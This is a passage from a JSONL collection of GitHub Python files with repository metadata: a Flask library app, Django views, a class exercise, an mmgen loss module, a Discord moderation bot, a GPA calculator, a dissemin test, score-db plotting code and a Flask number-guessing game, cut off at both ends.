request.form.get(\"check_password\")\n\n if password != confirmation:\n return apology(\"passwords do not match\", 400)\n\n rows = db.execute(\"SELECT * FROM users WHERE email = ?\", email)\n if len(rows) >= 1:\n return apology(\"username with that email already exists\", 400)\n\n hash = generate_password_hash(password)\n db.execute(\"INSERT INTO users (phone_number, email, hash) VALUES(?, ?, ?)\", phone_number, email, hash)\n return redirect(\"/\")\n\n else:\n return 
render_template(\"register.html\")\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect(\"/\")","repo_name":"Resmakor/Online-Library-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6580267724","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ValidationError\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import FormView\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom . import models\n\n\n@method_decorator(login_required(login_url='/account/login/'), name='dispatch')\nclass MakePostView(FormView):\n template_name = 'interaction/make_post.html'\n\n def get(self, request, *args, **kwargs):\n full_name = request.user.get_full_name()\n\n status = 'You are logged in.'\n name = full_name if not full_name.isspace() else request.user.email\n template_file = 'account_modal.html'\n return render(request, self.template_name,\n context={\n 'section_name': _('Draft'),\n 'logged_in': _(status),\n 'name': name,\n 'template_file': template_file,\n })\n\n def post(self, request, *args, **kwargs):\n data = request.POST\n story = models.Post()\n story.make_new_post(request=request,\n title=data['title'],\n content_body=data['content_body'])\n story.subtitle = data['subtitle'].strip()\n story.tldr = data['tldr'].strip()\n messages = []\n try:\n story.save()\n messages += 'Your post is published.'\n return JsonResponse({\n 'messages': messages,\n 'url': '/login/',\n 'all_clear': True,\n })\n except ValidationError as ve:\n messages += ve\n return JsonResponse({\n 'messages': messages,\n 'url': '/new-story/',\n 'all_clear': False,\n })\n","repo_name":"walter090/notitia","sub_path":"interaction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2899018687","text":"\"\"\"\nKlasa Kwiat:\natrybuty instancji:\nnazwa,kolor, odmiana, wzrost\nfunkcjonalnosc: rosnij, malej\n\n\"\"\"\n\n\nclass Kwiat:\n\n def __init__(self, name, kolor, odmiana, wzrost ):\n self.name = name\n self.kolor = kolor\n self.odmiana = odmiana\n self.wzrost = wzrost\n\n def rosnij(self):\n self.wzrost += 1\n\n def malej(self):\n self.wzrost -= 1\n\n\nkwiat = Kwiat('roza', 'red', 'k1', 30)\nprint(f'Sadzimy kwiat {kwiat.name}')\nfor i in range(15):\n print(f'W dniu {i} wysokość kwiata wynosi: {kwiat.wzrost}')\n kwiat.rosnij()\n \n","repo_name":"1piotrnowicki1/infoshare_cwiczenia","sub_path":"zjazd_4_OOP/ćwiczenie_class_kwiat.py","file_name":"ćwiczenie_class_kwiat.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2858233085","text":"'''\n@Time : 2022/7/14 14:43\n@Author : leeguandon@gmail.com\n'''\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mmgen.models.losses.utils import weighted_loss\nfrom mmgen.models.builder import MODULES\n\n\n@weighted_loss\ndef cross_entropy(pred, target):\n return F.cross_entropy(pred, target, reduction='none')\n\n\n@MODULES.register_module()\nclass CrossEntropy(nn.Module):\n def __init__(self, loss_weight=1.0, data_info=None, loss_name='cross_entropy'):\n super(CrossEntropy, self).__init__()\n 
\n self.loss_weight = loss_weight\n self.data_info = data_info\n self._loss_name = loss_name\n\n def forward(self, *args, **kwargs):\n if self.data_info is not None:\n # parse the args and kwargs\n if len(args) == 1:\n assert isinstance(args[0], dict), (\n 'You should offer a dictionary containing network outputs '\n 'for building up computational graph of this loss module.')\n outputs_dict = args[0]\n elif 'outputs_dict' in kwargs:\n assert len(args) == 0, (\n 'If the outputs dict is given as a keyword argument, no'\n ' further positional arguments should be offered.')\n outputs_dict = kwargs.pop('outputs_dict')\n else:\n raise NotImplementedError(\n 'Cannot parse the arguments passed to this loss module.'\n ' Please check the usage of this module')\n # link the outputs with loss input args according to self.data_info\n loss_input_dict = {\n k: outputs_dict[v]\n for k, v in self.data_info.items()\n }\n kwargs.update(loss_input_dict)\n kwargs.update(dict(weight=self.loss_weight))\n return cross_entropy(**kwargs)\n else:\n return cross_entropy(*args, weight=self.loss_weight, **kwargs)\n\n def loss_name(self):\n return self._loss_name\n","repo_name":"leeguandong/mmgeneration_add","sub_path":"mmgen_add/models/losses/pixelwise_loss.py","file_name":"pixelwise_loss.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18099162454","text":"# Done By the Almighty Kushurox helpers:-\n# 1]Jackaboi\n# I am still working on this\nimport discord\nfrom discord.ext import commands\nimport asyncio\nimport random\nimport os\n\nclient = commands.Bot(command_prefix=\"k!\")\n\ncount = 0\nhelp_msg = \"Toss\\nClr\\nrps rock|paper|scissor\\ncredits\\ncmds\\ntimer SEC|MINS\\nroles [optional argument]\\nkick\\nmute [member] [time OPTIONAL]\\nunmute [member]\"\ncredits_msg= \"Kushurox aka Kushal\\nJackaboi (his yt:https://www.youtube.com/channel/UCNp8BvJDLjsxFwl97FgDX7A)\"\nrestricted_words = [\"FUCK\",\"WTF\",\"FUK\",\"GAY\",\"STFU\"]\nroles_msg = \"**ROLES**\\npervert\\ndark\\nsenpai\\n\\n***NOTE:Please add the roles in the server roles before using these***\"\nroles_list = [\"pervert\",\"dark\",\"senpai\"]\n@client.event\nasync def on_ready():\n print(\"{0.user.name} with an id {1.user.id} logged in!\".format(client,client))\n await client.change_presence(game=discord.Game(name=\"with my k!cmds\"))\n@client.command()\nasync def toss():\n k = random.randint(0,1)\n if k == 0:\n await client.say(\"Heads\")\n else:\n await client.say(\"Tails\")\n\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def clr(ctx, amount=\"0\"):\n try:\n args = int(amount)\n if args == 0:\n await client.say(\"Please provide a valid argument\")\n return False\n elif args < 0:\n await client.say(\"Please provide a positive integer\")\n return False\n else:\n await client.purge_from(ctx.message.channel, limit=args)\n return True\n except ValueError:\n await client.say(\"Please provide numbers only\")\n except discord.HTTPException:\n await client.say(\"bad request please provide small numbers to prevent such issues\")\n@client.command(pass_context=True)\nasync def rps(ctx):\n k = random.randint(0,2)\n args = ctx.message.content.split(\" \")\n try:\n if args[1].upper() == \"ROCK\" or args[1].upper() == \"SCISSOR\" or args[1].upper() == \"PAPER\":\n if k == 0:\n await client.say(\"<@{0.message.author.id}> you win :D !\".format(ctx))\n elif k == 1:\n await client.say(\"<@{0.message.author.id}> Tie :| !\".format(ctx))
!\".format(ctx))\n else:\n await client.say(\"<@{0.message.author.id}> You Lose ;( !\".format(ctx))\n else:\n await client.say(\"Invalid Arguments try k!help\")\n except IndexError:\n await client.say(\"No Arguments Provided try k!help\")\n@client.command()\nasync def cmds():\n helpembed = discord.Embed(description=help_msg, colour=discord.Color.blue())\n helpembed.set_author(name=\"KushBot\")\n await client.say(embed=helpembed)\n\n@client.command()\nasync def credits():\n creditsembed = discord.Embed(description=credits_msg, colour=discord.Color.purple())\n creditsembed.set_author(name=\"Kushbot\")\n await client.say(embed=creditsembed)\n@client.event\nasync def on_message(message):\n k = message.content.upper().split(\" \")\n for j in k:\n if j in restricted_words:\n await client.delete_message(message)\n await client.send_message(message.channel, \"<@%s> Such words are not allowed!\" % (message.author.id))\n break\n await client.process_commands(message)\n@client.event\nasync def on_member_join(member: discord.Member):\n try:\n serverchannel = discord.utils.get(member.server.channels, name=\"join-leave-messages\")\n role = discord.utils.get(member.server.roles, id=\"member\")\n await client.add_roles(member, role)\n emb1 = (discord.Embed(description=\"Yo Welcome to our channel <@%s>\\nWant cool ranks please do k!roles\" % (member.id), colour=0x3DF270))\n emb1.set_author(name=\"KushBot\")\n await client.send_message(serverchannel, embed=emb1)\n except discord.Forbidden:\n serverchannel = discord.utils.get(member.server.channels, name=\"join-leave-messages\")\n emb1 = (discord.Embed(description=\"Yo Welcome to our channel <@%s>\\nWant cool ranks please do k!roles\" % (member.id), colour=0x3DF270))\n emb1.set_author(name=\"KushBot\")\n await client.send_message(member.channel, embed=emb1)\n except:\n emb1 = (discord.Embed(description=\"Yo Welcome to our channel <@%s>\\nWant cool ranks please do k!roles\" % (member.id), colour=0x3DF270))\n emb1.set_author(name=\"KushBot\")\n await client.send_message(serverchannel, embed=emb1)\n@client.event\nasync def on_member_remove(member: discord.Member):\n try:\n serverchannel = discord.utils.get(member.server.channels, name=\"join-leave-messages\")\n meml = member.name\n embl = (discord.Embed(description= meml+\" has left T_T.He/she/it doesn't knows the value of this server\", colour=0x3DF170))\n embl.set_author(name=\"KushBot\")\n await client.send_message(serverchannel, embed=embl)\n except:\n meml = member.name\n embl = (discord.Embed(description= meml+\" has left T_T.He/she/it doesn't knows the value of this server\", colour=0x3DF170))\n embl.set_author(name=\"KushBot\")\n await client.say(embed=embl)\n@client.command(pass_context=True)\nasync def timer(ctx, units = \"none\", amount :int = -1, *, reason = \" \"):\n \n if amount == -1:\n await client.say(\"Invalid Argument try for k!help or k!cmds\")\n return False\n elif amount == 0:\n await client.send_message(ctx.message.author, \"Are you a fool????\")\n return False\n elif units == \"none\":\n await client.send_message(ctx.message.channel, \"Invalid Argument try k!help or k!cmds\")\n return False\n elif units.upper() == \"MINS\":\n await client.send_message(ctx.message.author, \"No worries do your job ill Remind you :wink:\\nReason:\" + reason)\n await asyncio.sleep(amount * 60)\n await client.send_message(ctx.message.author, \"Timer is done get back!\\nReason:\" + reason)\n elif units.upper() == \"SEC\":\n await client.send_message(ctx.message.author, \"No worries do your job ill Remind you 
:wink:\\nReason:\" + reason)\n await asyncio.sleep(amount)\n await client.send_message(ctx.message.author, \"Timer is done get back!\\nReason:\" + reason)\n else:\n await client.say(\"Something is wrong\")\n@client.command(pass_context=True)\nasync def roles(ctx, rolename = \"none\"):\n if rolename == \"none\":\n rembed = discord.Embed(description=roles_msg, colour=discord.Color.dark_gold())\n rembed.set_author(name=\"KushBot\")\n await client.say(embed=rembed)\n elif rolename in roles_list:\n if rolename not in ctx.message.author.roles:\n role = discord.utils.get(ctx.message.server.roles, name=rolename)\n await client.add_roles(ctx.message.author, role)\n await client.say(\"**Role set**\")\n else:\n role = discord.utils.get(ctx.message.server.roles, name=rolename)\n await client.remove_roles(ctx.message.author, role)\n await client.say(\"**Role Removed**\")\n else:\n await client.say(\"Role not exisitng.\")\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def kick(ctx, name : discord.Member = \"none\"):\n try:\n if name == \"none\":\n await client.say(\"Who the fish should i kick?\")\n return False\n await client.kick(name)\n await client.say(\"Kicked his ass :wink:\")\n except discord.Forbidden:\n await client.say(\"I lack perms bruhh\")\n except:\n await client.say(\"User not existing\")\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def mute(ctx, member : discord.Member = None, minutes = \"0\"):\n try:\n time = int(minutes)\n if member != None and time == 0:\n try:\n role= discord.utils.get(ctx.message.server.roles, name=\"Muted\")\n await client.add_roles(member, role)\n emb1 = discord.Embed(description=\"Shut up {0.name} you have been muted\\nduration:∞\".format(member), colour=discord.Color.blue())\n emb1.set_author(name=\"KushBot\")\n await client.say(embed=emb1)\n except discord.Forbidden:\n await client.say(\"I dont have permissions ;(\")\n except:\n await client.say(\"Role not existing please create one\")\n elif member != None and time != 0:\n try:\n role = discord.utils.get(ctx.message.server.roles, name=\"Muted\")\n await client.add_roles(member, role)\n emb1 = discord.Embed(description=\"Shut up {0.name} you have been muted\\nduration:{1} min\".format(member,time),colour=discord.Color.blue())\n emb1.set_author(name=\"KushBot\")\n await client.say(embed=emb1)\n await asyncio.sleep(time * 60)\n await client.remove_roles(member, role)\n await client.say(\"You have been unmuted <@{0.id}>\".format(member))\n except discord.Forbidden:\n await client.say(\"I lack perms ;(\")\n except:\n await client.say(\"Role Not existing please create one\")\n elif member != None and time < 0:\n await client.say(\"Provide a positive integer\")\n return False\n else:\n await client.say(\"Invalid Arguments please try k!cmds\")\n return False\n except:\n await client.say(\"Invalid Arguments try k!cmds\")\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def unmute(ctx, member : discord.Member = None):\n try:\n if member == None:\n await client.say(\"Who the fish should i mute?\")\n return False\n m_role = discord.utils.get(ctx.message.server.roles, name=\"Muted\")\n await client.remove_roles(member, m_role)\n await client.say(\"fine fine you can talk... 
{0.name}\".format(member))\n except discord.Forbidden:\n await client.say(\"I lack perms bruhh\")\n except:\n await client.say(\"Role not Existing\")\n\n \n\n\n\n\n\n\n \n\nclient.run(os.getenv('TOKEN'))\n","repo_name":"Lordksk/MyDiscordBot","sub_path":"KushBot.py","file_name":"KushBot.py","file_ext":"py","file_size_in_byte":10051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28603292170","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 4 09:53:52 2020\r\n\r\n@author: Kyra\r\n\"\"\"\r\n#Focus on lists, loops, if-else, print output(?)\r\ngrade_list = []\r\ncredit_list = []\r\nname_list = []\r\nx = 1\r\ntotal_credits = 0\r\ntotal_points = 0\r\nprint('Semester GPA calculator')\r\nnum_of_classes = int(input('How many classes did you have?: '))\r\nwhile x <= num_of_classes:\r\n name1 = input('Name of class ' + str(x) + ': ')\r\n name_list.append(name1)\r\n credit = 0\r\n while True:\r\n credit = input('How many credits was the class?: ')\r\n if credit.isdigit():\r\n break\r\n else:\r\n print('Invalid, enter an integer')\r\n credit_list.append(int(credit))\r\n while True: #wth is this\r\n grade1 = input('What grade did you get? (A,B,C,D,F): ')\r\n grade1 = grade1.upper()\r\n if grade1 == 'A':\r\n grade1 = 4.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'B':\r\n grade1 = 3.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'C':\r\n grade1 = 2.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'D':\r\n grade1 = 1.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'F':\r\n grade1 = 0.0\r\n grade_list.append(grade1)\r\n else:\r\n print('Invalid input, try again')\r\n continue\r\n break\r\n x += 1\r\ni = 0\r\nfor i in range(0, len(grade_list)): \r\n total_credits = total_credits + credit_list[i] \r\n total_points = total_points + (grade_list[i] * credit_list[i])\r\nprint(name_list)\r\nprint(grade_list)\r\nprint(credit_list)\r\nprint('Total points: ',total_points)\r\nprint('Total credit hours: ', total_credits)\r\nfinal_gpa = total_points/total_credits\r\nprint('Semester GPA: %0.2f'% (final_gpa))","repo_name":"pymavs-uta/GPA-Calculator","sub_path":"Basic/gpa.py","file_name":"gpa.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38594813054","text":"import os\nimport pytest\n\nimport django.test\n\nfrom backend.oadoi import OadoiAPI\nfrom papers.models import Paper\n\n@pytest.mark.usefixtures(\"load_test_data\")\nclass OadoiAPITest(django.test.TestCase):\n\n @classmethod\n def setUpClass(cls):\n super(OadoiAPITest, cls).setUpClass()\n cls.testdir = os.path.dirname(os.path.abspath(__file__))\n\n @pytest.mark.usefixtures('mock_doi')\n def test_ingest_dump(self):\n doi = '10.1080/21645515.2017.1330236'\n p = Paper.create_by_doi(doi)\n self.assertEqual(p.pdf_url, None)\n Paper.create_by_doi(doi)\n\n # then load an OAdoi dump\n oadoi = OadoiAPI()\n oadoi.load_dump(os.path.join(self.testdir, 'data/sample_unpaywall_snapshot.jsonl.gz'))\n\n # the paper is now OA, yay!\n p = Paper.get_by_doi(doi)\n self.assertEqual(p.pdf_url, 'http://europepmc.org/articles/pmc5718814?pdf=render')\n","repo_name":"dissemin/dissemin","sub_path":"backend/tests/test_oadoi.py","file_name":"test_oadoi.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"21"} +{"seq_id":"33792759645","text":"import pprint\nfrom skills import *\n\ndef gleichung(erg,schablone):\n 
buchstaberl =[]\n glgs =[]\n for i in erg:\n expo =i[1]\n links =list(filter(lambda x: x[2] ==expo,schablone))\n glgs.append([i[0],links])\n #p##print.p##print(glgs)\n def watchInLetters(letters,glgi):\n for letter in letters:\n i=0\n while i 0:\n appender.append(True)\n else:\n appender.append(False)\n #print(appender)\n returner.append(appender)\n return returner\n\n\n\n\ndef termSchablone(highestExpo,nullst) ->list:\n highestExpo =highestExpo+1\n schablone=[]\n letters =\"abcdefghijklmnopqrstuvwxyz\"\n charindex =0\n while highestExpo >-1: \n glied_1 =None\n glied_2 =None\n ko_1 =(1.0,letters[charindex])\n ko_2 =(-nullst,letters[charindex])\n ###print(ko_2)\n expo_1 =highestExpo\n expo_2 =highestExpo-1\n ###print(expo_2)\n if expo_1 >1:\n glied_1=[*ko_1,expo_1,True]\n glied_2=[*ko_2,expo_2,True]\n elif expo_1 ==1:\n glied_1=[*ko_1,expo_1,True]\n glied_2=[*ko_2,expo_2,False]\n elif expo_1 == 0:\n glied_1=[*ko_1,expo_1,False]\n highestExpo=highestExpo-1\n charindex=charindex+1\n \n for eintrag in [glied_1,glied_2]:\n schablone.append(eintrag)\n return list(filter(lambda x: x!=None,schablone))\n\ndef termVgl(original,nullst):\n nullst=round(nullst,3)\n letters=\"abcdefghijklmnopqrstuvwxyz\"\n copy =termSchablone(original[0][1]-1,nullst)\n erg =[]\n for wertePaar in original:\n erg.append([wertePaar[0],wertePaar[1]])\n ##print(\"erg\",erg)\n ##print(\"schablone\",copy)\n return gleichung(erg,copy)\n\n\nif __name__ == '__main__':\n term =main(\"x^3 -11x^2 +39x -45\")\n ###print(term)\n nullst =nullstelle(-100,100,term)\n #schablone =termSchablone(term[0][1]-1,nullst)\n ###print(schablone)\n newTerm =termVgl(term,nullst)\n print(newTerm)\n nullst_1 =nullstelle(-100.0,100.0,newTerm)\n print(nullst_1)\n term_lst =termVgl(newTerm,nullst_1)\n print(nullstelle(-100.0,100.0,term_lst))\n","repo_name":"masssi164/test","sub_path":"kurvendiskussion/logic/koeffizientenVgl.py","file_name":"koeffizientenVgl.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9669805177","text":"from collections import namedtuple\nimport copy\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nimport json\nimport matplotlib.pyplot as plt\nimport matplotlib.pylab as pl\nimport numpy as np\nimport os\nimport pathlib\n\nimport pprint\nimport traceback\n\nimport pandas as pd\nfrom pandas import DataFrame\n\nimport time_utils\nfrom time_utils import DateRange\nfrom score_hv.harvester_base import harvest\nfrom expt_metrics import ExptMetricInputData, ExptMetricRequest\nfrom innov_stats_plot_attrs import plot_attrs, region_labels\n\n\nRequestData = namedtuple(\n 'RequestData',\n [\n 'datetime_str',\n 'experiment',\n 'metric_format_str',\n 'metric',\n 'stat',\n 'regions',\n 'elevation_unit',\n 'time_valid'\n ],\n)\n\n\n@dataclass\nclass StatGroupData:\n stat_group_dict: dict\n cycles: list = field(default_factory=list, init=False)\n stat_group_frmt_str: str = field(default_factory=str, init=False)\n metrics: list[str] = field(init=False)\n stats: list[str] = field(init=False)\n regions: list[str] = field(init=False)\n elevation_unit: str = field(init=False)\n\n def __post_init__(self):\n self.cycles = self.stat_group_dict.get('cycles')\n self.stat_group_frmt_str = self.stat_group_dict.get('stat_group_frmt_str')\n self.metrics = self.stat_group_dict.get('metrics')\n self.stats = self.stat_group_dict.get('stats')\n self.regions = self.stat_group_dict.get('regions')\n self.elevation_unit = 
self.stat_group_dict.get('elevation_unit')\n\n\ndef get_experiment_metrics(request_data):\n \n expt_metric_name = request_data.metric_format_str.replace(\n '{metric}', request_data.metric\n )\n\n expt_metric_name = expt_metric_name.replace(\n '{stat}', request_data.stat\n )\n\n time_valid_from = datetime.strftime(\n request_data.time_valid.start, request_data.datetime_str)\n\n time_valid_to = datetime.strftime(\n request_data.time_valid.end, request_data.datetime_str)\n\n request_dict = {\n 'name': 'expt_metrics',\n 'method': 'GET',\n 'params': {\n 'datestr_format': request_data.datetime_str,\n 'filters': {\n 'experiment': request_data.experiment, \n 'metric_types': {\n 'name': {\n 'exact': [expt_metric_name]\n },\n 'stat_type': {\n 'exact': [request_data.stat]\n }\n },\n 'regions': {\n 'name': {\n 'exact': request_data.regions\n },\n },\n 'time_valid': {\n 'from': time_valid_from,\n 'to': time_valid_to,\n },\n 'elevation_unit': {\n 'exact': [request_data.elevation_unit]\n }\n },\n 'ordering': [\n {'name': 'time_valid', 'order_by': 'asc'},\n {'name': 'elevation', 'order_by': 'desc'}\n ]\n }\n }\n\n print(f'request_dict: {request_dict}')\n\n emr = ExptMetricRequest(request_dict)\n result = emr.submit()\n\n return result.details['records']\n\n\ndef build_base_figure():\n fig = plt.figure()\n ax = plt.subplot()\n # ax.cla()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n plt.tick_params(\n axis='x',\n which='both',\n bottom=False,\n top=False,\n labelbottom=True\n )\n \n return (plt, fig, ax)\n\n\ndef format_figure(plt, ax, pa, region_label):\n\n plt.title(region_label)\n plt.gca().set_xlim([pa.axes_attrs.xmin, pa.axes_attrs.xmax])\n plt.gca().set_ylim([pa.axes_attrs.ymin, pa.axes_attrs.ymax])\n \n xticks = np.arange(\n pa.axes_attrs.xmin,\n (pa.axes_attrs.xmax + 1.e-6),\n pa.axes_attrs.xint\n ) \n plt.xticks(xticks)\n \n plt.xlabel(\n xlabel=pa.xlabel.label,\n horizontalalignment=pa.xlabel.horizontalalignment\n )\n \n plt.ylabel(\n ylabel=pa.ylabel.label,\n horizontalalignment=pa.ylabel.horizontalalignment\n )\n \n plt.gca().invert_yaxis()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n \n if pa.stat == 'bias':\n plt.vlines(\n x=0.0,\n ymin=pa.axes_attrs.ymin,\n ymax=pa.axes_attrs.ymax,\n linestyles='dashed',\n colors='gray',\n linewidth=0.5\n )\n\n plt.legend(\n loc=pa.legend.loc,\n fancybox=pa.legend.fancybox,\n edgecolor=pa.legend.edgecolor,\n framealpha=pa.legend.framealpha,\n shadow=pa.legend.shadow,\n facecolor=pa.legend.facecolor,\n )\n\n\ndef build_fig_dest(\n work_dir,\n fig_base_fn,\n metric,\n stat,\n region,\n date_range\n):\n \n start = datetime.strftime(date_range.start, '%Y%m%dT%HZ')\n end = datetime.strftime(date_range.end, '%Y%m%dT%HZ')\n dest_fn = fig_base_fn\n dest_fn += f'__{metric}_{stat}_{region}__{start}_to_{end}.png'\n \n dest_full_path = os.path.join(work_dir, dest_fn)\n \n parent_dir = pathlib.Path(dest_full_path).parent\n pathlib.Path(parent_dir).mkdir(parents=True, exist_ok=True)\n return dest_full_path\n\n\ndef save_figure(plt, dest_full_path):\n print(f'saving figure to {dest_full_path}')\n plt.savefig(dest_full_path)\n\n\ndef plot_innov_stats(\n experiments,\n metric,\n stat,\n metrics_df,\n work_dir,\n fig_base_fn,\n date_range\n):\n\n if not isinstance(metrics_df, DataFrame):\n msg = 'Input data to plot_innov_stats must be type pandas.DataFrame '\\\n f'was actually type: {type(metrics_df)}'\n raise TypeError(msg)\n \n plt_attr_key = f'{metric}_{stat}'\n pa = plot_attrs[plt_attr_key]\n \n ave_df = 
metrics_df.groupby(\n ['expt_name', 'elevation', 'region'], as_index=False\n )['value'].mean()\n \n # loop through regions\n regions = ave_df.drop_duplicates(\n ['region'], keep='last'\n )['region'].values.tolist()\n \n expt_names = ave_df.drop_duplicates(\n ['expt_name'], keep='last'\n )['expt_name'].values.tolist()\n\n for region in regions:\n # if region != 'global':\n # continue\n\n (plt, fig, ax) = build_base_figure()\n\n for expt in experiments:\n \n expt_name = expt.get('expt_name')\n stat_vals = ave_df.loc[\n (ave_df['region'] == region) &\n (ave_df['expt_name'] == expt_name),\n 'value'\n ]\n\n elevations = ave_df.loc[\n (ave_df['region'] == region) &\n (ave_df['expt_name'] == expt_name),\n 'elevation'\n ]\n\n plt.plot(\n stat_vals,\n elevations,\n color=expt.get('graph_color'),\n label=expt.get('graph_label')\n )\n \n format_figure(plt, ax, pa, region_labels[region])\n\n fig_fn = build_fig_dest(\\\n work_dir,\n fig_base_fn,\n metric,\n stat,\n region,\n date_range\n )\n\n save_figure(plt, fig_fn)\n\n\n@dataclass\nclass ExperimentData(object):\n name: str\n wallclock_start: str\n graph_color: str\n graph_label: str\n \n def get_dict(self):\n return {\n 'name': {\n 'exact': self.name\n },\n 'wallclock_start': {\n 'from': self.wallclock_start,\n 'to': self.wallclock_start\n },\n 'expt_name': self.name,\n 'expt_start': self.wallclock_start,\n 'graph_label': self.graph_label,\n 'graph_color': self.graph_color\n }\n\n\n@dataclass\nclass PlotInnovStatsRequest(object):\n config_dict: dict\n date_range: DateRange = field(init=False)\n stat_groups: list = field(default_factory=list, init=False)\n datetime_str: str = field(default_factory=str, init=False)\n experiments: list = field(default_factory=list, init=False)\n work_dir: str = field(default_factory=str, init=False)\n fig_base_fn: str = field(default_factory=str, init=False)\n\n def __post_init__(self):\n date_range_dict = self.config_dict.get('date_range')\n self.datetime_str = date_range_dict.get('datetime_str')\n start_str = date_range_dict.get('start')\n end_str = date_range_dict.get('end')\n \n self.experiments = self.get_experiments(self.config_dict)\n \n try:\n start = datetime.strptime(start_str, self.datetime_str)\n end = datetime.strptime(end_str, self.datetime_str)\n except Exception as err:\n trcbk = traceback.format_exc()\n msg = f'Problem parsing date range: {date_range_dict}, ' \\\n f'err: {trcbk}'\n print(f'{msg}')\n raise ValueError(msg) from err\n\n self.date_range = DateRange(start, end)\n\n stat_groups = self.config_dict.get('stat_groups')\n if not isinstance(stat_groups, list):\n trcbk = traceback.format_exc()\n msg = 'No stat_groups key found or invalid type: ' \\\n f'stat_groups: {stat_groups}, type(stat_groups): ' \\\n f'{type(stat_groups)}, err: {trcbk}'\n raise TypeError(msg)\n\n for stat_group_dict in stat_groups:\n if not isinstance(stat_group_dict, dict):\n trcbk = traceback.format_exc()\n msg = 'stat_group_dict is invalid type: ' \\\n f'stat_group_dict: {stat_group_dict}, ' \\\n f'type(stat_group_dict): {type(stat_group_dict)}, ' \\\n f'err: {trcbk}'\n raise TypeError(msg)\n\n self.stat_groups.append(StatGroupData(stat_group_dict))\n \n self.work_dir = self.config_dict.get('work_dir')\n self.fig_base_fn = self.config_dict.get('fig_base_fn')\n\n\n def get_experiments(self, config_dict):\n \n experiments = config_dict.get('experiments')\n if not isinstance(experiments, list):\n msg = 'The \\'experiments\\' must be type list, actually ' \\\n f'{type(experiments)}'\n raise TypeError(msg)\n\n experiments_data = 
[]\n for experiment in experiments:\n if not isinstance(experiment, dict):\n msg = 'Each \\'experiment\\' must be type dict, actually ' \\\n f'{type(experiment)}'\n raise TypeError(msg)\n \n name = experiment.get('name')\n wallclk_strt = experiment.get('wallclock_start')\n graph_color = experiment.get('graph_color')\n graph_label = experiment.get('graph_label')\n expt_data = ExperimentData(\n name, wallclk_strt, graph_color, graph_label\n )\n experiments_data.append(expt_data.get_dict())\n\n return experiments_data\n\n\n def submit(self):\n \n master_list = []\n n_hours = 6\n n_days = 0\n\n finished = False\n loop_count = 0\n \n for stat_group in self.stat_groups:\n elevation_unit = stat_group.elevation_unit\n metrics_data = []\n # gather experiment metrics data for experiment and date range\n for metric in stat_group.metrics:\n for stat in stat_group.stats:\n m_df = DataFrame()\n for experiment in self.experiments:\n request_data = RequestData(\n self.datetime_str,\n experiment,\n stat_group.stat_group_frmt_str,\n metric,\n stat,\n stat_group.regions,\n stat_group.elevation_unit,\n self.date_range\n )\n\n e_df = get_experiment_metrics(request_data)\n e_df = e_df.sort_values(['expt_name', 'region', 'elevation'])\n m_df = pd.concat([m_df, e_df], axis=0)\n\n plot_innov_stats(\n self.experiments,\n metric,\n stat,\n m_df,\n self.work_dir,\n self.fig_base_fn,\n self.date_range\n )\n","repo_name":"NOAA-PSL/score-db","sub_path":"src/plot_innov_stats.py","file_name":"plot_innov_stats.py","file_ext":"py","file_size_in_byte":12533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14653670574","text":"from flask import Flask, render_template, request, redirect, session\nimport random\n\napp = Flask(__name__)\napp.secret_key = '91^64.3[4 42'\n\n@app.route('/')\ndef index():\n\n if not session.get('myNum'): # its a good thing the range starts at 1; i learned that if you hold a 0 in\n # the variable using this kind of check then\n # the conditional will trigger and you end up with always initializing the \n # variable whenever the route is called. Obvious, after the fact\n session['myNum'] = random.randint(1,100)\n session['colorDiff'] = 200\n print('My number is', session['myNum'])\n \n return render_template('index.html')\n\n@app.route('/check', methods=['POST'])\ndef check():\n userGuess = request.form\n \n g = int(userGuess['guess'])\n mn= int(session['myNum'])\n d = g - mn \n session['colorDiff'] = d # I computed the difference between the guess and the random number.\n # That allows for very specific and direct comparisons. Originally I\n # was going to be cute and make the color change as graded by the difference\n # but maybe another time. 
